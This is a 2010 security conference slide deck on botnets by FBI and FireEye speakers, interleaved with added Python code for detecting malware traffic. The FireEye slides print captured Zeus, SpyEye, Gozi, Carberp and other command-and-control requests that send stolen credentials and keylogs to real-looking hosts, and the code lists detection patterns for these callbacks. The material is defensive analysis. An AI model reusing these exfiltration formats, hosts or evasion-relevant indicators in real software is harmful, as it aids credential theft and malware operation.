8/6/2019 MASTER_October.web Conference PPT
1/44
Botnets
ISSA Web Conference, October 26, 2010
Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London
Sponsored by:
Welcome: Conference Moderator
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee
Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI
Rooting Out the Bad Actors
Alex Lanstein - Systems Consulting Engineer, FireEye
Joint Speaker Question & Answer
Closing Comments
How Botnets Have Evolved
presented by
Special Agent Chris Calderon
FBI
UNCLASSIFIED
Agenda
What is a botnet?
How are botnets created?
Why are botnets created?
Basic structure of a botnet
Taking down a botnet
How botnets are evolving
Botnets in the news
Questions
What is a botnet?
A network of compromised computers (robots/bots)
Controlled by a bot master / herder
Used to carry out various illegal activities
Services are often sold to other criminal elements
How are botnets created?
Setup
Obtain reliable infrastructure
Develop malware and C&C software
Victims
Malware loaded onto victim machines
Done through exploits and/or social engineering
Manage
Continually update software / instructions to bots
Maintain statistics for the botnet
Why are botnets created?
Spam
Distributed Denial of Service (DDoS)
Click Fraud
Fake Anti-Virus
Credential Theft
Proxy Service
Cyber Warfare
Basic Structure
[Diagram: Bot Master / Herder -> C&C Servers -> Victims]
Taking down a botnet
[Diagram: the same Bot Master / Herder -> C&C Servers -> Victims structure]
Botnets evolving
[Diagram: Bot Master / Herder -> C&C Servers -> Proxies -> Victims; a proxy layer now sits between the C&C servers and the victims]
Botnets evolving
[Diagram: Bot Master / Herder -> Proxies -> C&C Servers -> Proxies -> Victims; proxies now also sit between the bot master and the C&C servers]
Botnets in the news
ZEUS
Steals and logs online banking credentials
Primarily targets high balance accounts
Money mules used to get money to bad actors
Kit now used by many different groups
Estimated $70,000,000 stolen from US banks
Botnets in the news
MARIPOSA (BUTTERFLY)
Steals online credentials, and also used in DDoS attacks
Estimated 12 million infected computers
Bad actors traced to Spain and arrested
Criminal proceedings ongoing
Botnets in the news
SPAM BOTS
Conficker, Cutwail, Waledac, ...
Up to 10 million bots per botnet
Each botnet can send billions of spam emails per day
Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay-per-click advertising, ...
Questions?
Rooting out the Bad Actors, or: p2p, fast flux, and other botnet myths
Alex Lanstein
Senior Security Researcher
FireEye, Inc.
8/6/2019 MASTER_October.web Conference PPT
18/44
Today's Agenda
Understanding the shift from conventional to modern malware, and the resultant hosting needs
A few TT&P to uncover older or moderately sophisticated malware
A detailed look at a few bots in the news
Conventional vs. Modern, APT Malware
Conventional Malware
Characterized by using spreading techniques, custom C&C transport protocols, IRC communication
Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
Detectable through a variety of technologies/tactics:
NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
Port scanning, high Windows port activity, non-HTTP over port 80, non-web traffic, etc.
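Two of the tells listed above, non-HTTP traffic over port 80 and a host fanning out to many peers on Windows ports, are simple enough to check mechanically. The following Python is an added example (not code from the deck or from FireEye) that runs those two checks over constructed flow records; the record layout, the peer-count threshold and the RFC 5737 addresses are assumptions.

```python
# Added example (not from the ISSA deck): flag two "conventional malware" tells
# from the slide over constructed flow records.
import re
from collections import defaultdict

# Request line per RFC 7230: METHOD SP request-target SP HTTP/x.y CRLF
HTTP_REQUEST_LINE = re.compile(rb"^[A-Z]{3,7} \S+ HTTP/1\.[01]\r\n")
WINDOWS_PORTS = {135, 137, 139, 445}   # RPC, NetBIOS, SMB


def looks_like_http(payload: bytes) -> bool:
    """True if the first bytes of a TCP/80 payload form a valid HTTP request line."""
    return HTTP_REQUEST_LINE.match(payload) is not None


def find_suspicious_hosts(flows, min_windows_peers=5):
    """flows: iterable of dicts with src, dst, dport and payload (first bytes sent).
    Returns {src: [reasons]} for every source host that trips a tell."""
    windows_peers = defaultdict(set)
    reasons = defaultdict(list)
    for f in flows:
        # Tell 1: something other than HTTP riding the usually-open port 80
        if f["dport"] == 80 and f["payload"] and not looks_like_http(f["payload"]):
            reasons[f["src"]].append(f"non-HTTP payload to {f['dst']}:80")
        # Tell 2: fan-out to many distinct hosts on Windows ports (scanning)
        if f["dport"] in WINDOWS_PORTS:
            windows_peers[f["src"]].add(f["dst"])
    for src, peers in windows_peers.items():
        if len(peers) >= min_windows_peers:
            reasons[src].append(f"{len(peers)} distinct peers on Windows ports")
    return dict(reasons)


# Constructed sample flows (RFC 5737 documentation addresses, .invalid names).
SAMPLE_FLOWS = [
    {"src": "192.0.2.10", "dst": "203.0.113.5", "dport": 80,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n"},
    {"src": "192.0.2.11", "dst": "203.0.113.9", "dport": 80,
     "payload": b"NICK bot1234\r\nUSER bot 0 * :bot\r\n"},   # IRC-style chatter on 80
] + [
    {"src": "192.0.2.12", "dst": f"192.0.2.{n}", "dport": 445, "payload": b""}
    for n in range(20, 26)   # six peers on 445 from one host: scanning pattern
]

if __name__ == "__main__":
    for host, why in find_suspicious_hosts(SAMPLE_FLOWS).items():
        print(host, "->", "; ".join(why))
```

The HTTP check only looks at the request line, so it catches custom transports wrapped in port 80 but not malware that speaks well-formed HTTP; that is exactly the gap the next slide's "modern" malware exploits.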
Conventional vs. Modern Malware
Modern-ish malware: Characterized by infecting via browser-based exploits
Exploit Channel: PDF, Flash, IE/Firefox, QuickTime
C&C: Callback over HTTP(S)
Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye
Partially detectable through manual traffic analysis fairly easily, but a full-time resource is needed
World's Top Malware
Source: FireEye Malware Intelligence Lab
Modern Malware Infection Lifecycle
[Diagram: the victim sits behind desktop antivirus ("losing the threat arms race"), perimeter security (signature, rule-based) and other gateways (list-based, signatures); the attacker side is a compromised web server or Web 2.0 site plus a callback server]
1. System gets exploited
Drive-by attacks in casual browsing
Links in targeted emails
Socially engineered binaries
2. Dropper malware installs
First step to establish control
Calls back out to criminal servers
Found on compromised sites, and Web 2.0, user-created content sites
3. Malicious data theft & long-term control established
Uploads data stolen via keyloggers, Trojans, bots, & file grabbers
One exploit leads to dozens of infections on same system
Criminals have built long-term control mechanisms into system
Where is all this malware being hosted?
Previously we used to see malware being hosted on infected home machines
Web filters responded by blocking access to domains that had multiple A records in residential IP space
Now it's being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR-registered IP space!
Root of the Problem
There is no Internet Police!
Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.
How the Internet is delegated
In the name space (think DNS):
ICANN -> Registries
Registries == Verisign, Affilias, ccTLD operators
Registries sell to certified gTLD and regional registrars
Registrars == namecheap.com, godaddy.com, netsol.com
Registrars sell to registrants (end user)
How the Internet is delegated
In the IP space:
ICANN/IANA (Internet Assigned Numbers Authority)
IANA -> RIRs
RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
RIRs -> LIRs
LIRs are generally data centers and ISPs
ICANN't do anything!
ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn't violate the contract. These contracts have no mention of content.
Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
Large pushback when someone even suspects they are trying to take an authoritative stance on something.
Big bots in 2010
Rustock still sticking around
POST /index.php?topic=33.117 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://go-thailand-now.com/
Content-Type: application/x-www-form-urlencoded
Content-Encoding: gzip
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: go-thailand-now.com
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
Gozi
POST /cgi-bin/forms.cgi HTTP/1.0
Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3
User-Agent: IE
Host: 91.216.215.130
Content-Length: 453
Pragma: no-cache

----------------------------139b9b3139b9b3139b9b3
Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
Content-Type: application/octet-stream

URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901FhI&it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&=mousemove
----------------------------139b9b3139b9b3139b9b3--
Zeus
POST /xed/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
Host: schastlivieiveselierebyta0001.com
Content-Length: 329
Connection: Keep-Alive
Cache-Control: no-cache

[329 bytes of encrypted binary POST body, rendered as unprintable characters on the slide]
Tigger: Not just financials anymore
POST /track_c.cgi HTTP/1.0
Content-Length: 81
[encoded POST body, rendered as unprintable characters on the slide]

SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;
[[[URL: https://internal.fireeye.com/login
Title:
Process: C:\Program Files\Internet Explorer\iexplore.exe
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]]
{{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}
SpyEye: ZeuS replacement?
GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: hahsdhsl.com
Pragma: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: www.promohru.in
Pragma: no-cache
Carberp: Yet Another Datastealer
POST /recv.php HTTP/1.1
Host: 194.54.80.146
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 331

uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww%2Estarwoodhotels%2Ecom%252Fpreferredguest%252Findex%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2ECOM%26persist%3Dtrue%26password%3Dmypassword
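The Rustock, Gozi, Zeus, SpyEye and Carberp captures above share a handful of tells that a traffic analyst can pick out by hand: a User-Agent that no real browser sends, a Host header that is a bare IP, a check-in script such as gate.php or recv.php, guid/ver/stat beacon parameters, and a POST body that is either opaque binary or a URL-encoded bundle of someone's login form. The following Python is an added example (not code from the slides or from FireEye) that scores raw requests for those tells. The sample requests are constructed to mirror the captures using RFC 5737 addresses and .invalid hostnames, and the script-name list and regular expressions are assumptions drawn from this section, not a vendor signature set.

```python
# Added example (not from the ISSA deck): score raw HTTP callbacks for the tells
# shared by the Rustock/Gozi/Zeus/SpyEye/Carberp captures on the slides.
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

BROWSER_UA = re.compile(r"^Mozilla/\d\.\d \(")       # genuine browser strings start this way
CHECKIN_SCRIPTS = {"gate.php", "recv.php", "forms.cgi", "track_c.cgi"}   # names seen on the slides
CRED_RE = re.compile(r"(?:^|[&?;])(?:password|passwd|pass|_k|KEYLOG)=", re.I)


def parse_request(raw: bytes):
    """Split a raw request into (method, target, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def is_printable(body: bytes) -> bool:
    return all(32 <= b < 127 or b in (9, 10, 13) for b in body)


def score_callback(raw: bytes):
    """Return the list of indicators that fire for one request (empty if none)."""
    method, target, headers, body = parse_request(raw)
    hits = []
    ua = headers.get("user-agent", "")
    if not BROWSER_UA.match(ua):
        hits.append(f"non-browser User-Agent {ua!r}")
    host = headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
        hits.append("Host header is a bare IP")
    except ValueError:
        pass
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] in CHECKIN_SCRIPTS:
        hits.append(f"known check-in script {parts.path}")
    params = set(parse_qs(parts.query))
    text_body = body.decode("latin-1")
    if method == "POST" and body:
        params |= set(parse_qs(text_body))
    if {"guid", "ver", "stat"} <= params:
        hits.append("guid/ver/stat beacon parameters")
    # Unquote twice so a nested, doubly-encoded form post (Carberp style) is visible.
    if method == "POST" and body and CRED_RE.search(unquote(unquote(text_body))):
        hits.append("credential-looking fields in body")
    if method == "POST" and body and not is_printable(body):
        hits.append(f"binary body under Content-Type {headers.get('content-type', 'missing')}")
    return hits


# Constructed sample requests modelled on the captures in this section.
BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: www.example.invalid\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:3.6) Gecko/20100101 Firefox/3.6\r\n\r\n")
SPYEYE_LIKE = (b"GET /web/map/gate.php?guid=user1!AAAA!1234&ver=10280&stat=ONLINE&cpu=0 HTTP/1.0\r\n"
               b"User-Agent: Microsoft Internet Explorer\r\nHost: checkin.invalid\r\n"
               b"Pragma: no-cache\r\n\r\n")
ZEUS_LIKE = (b"POST /xed/gate.php HTTP/1.1\r\n"
             b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64)\r\n"
             b"Host: panel.invalid\r\nConnection: Keep-Alive\r\n\r\n"
             b"\x00\x8f\x12\xfe\x01\x99\xab\xcd")
CARBERP_LIKE = (b"POST /recv.php HTTP/1.1\r\nHost: 192.0.2.77\r\n"
                b"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) "
                b"Gecko/20100914 Firefox/3.6.10\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                b"uid=ABC123&brw=2&type=1&data=https%3A%2F%2Fbank.invalid%2Flogin"
                b"%3Flogin%3Duser%26password%3Dhunter2")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("spyeye-like", SPYEYE_LIKE),
                      ("zeus-like", ZEUS_LIKE), ("carberp-like", CARBERP_LIKE)):
        print(f"{name}: {score_callback(req) or 'no indicators'}")
```

None of these indicators is conclusive on its own (a bare-IP Host header is common in test traffic, and a sloppy legacy client can send a strange User-Agent), which is why the function returns every indicator that fired rather than a verdict; the analyst the slide says is needed full time is the one who weighs them.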
TDSS: Full on SSL
19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620
[TLS handshake bytes, rendered as unprintable characters on the slide; the readable certificate fields are C=AU, ST=Some-State, O=Internet Widgits Pty Ltd (the OpenSSL sample defaults), with validity 100114192303Z to 110114192303Z]
FireEye, Inc. Confidential
www.fireeye.com
For late-breaking malware research and news: blog.fireeye.com
Thank you!
Alex Lanstein, [email protected]
Joint Speaker Question & Answer
Chris Calderon, Special Agent, FBI
Alex Lanstein, Systems Consulting Engineer, FireEye
Closing Remarks
Online Meetings Made Easy
Thank you to Citrix for donating this Webcast service
Thank you to FireEye for their support of ISSA and this Web Conference
CPE Credit
Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.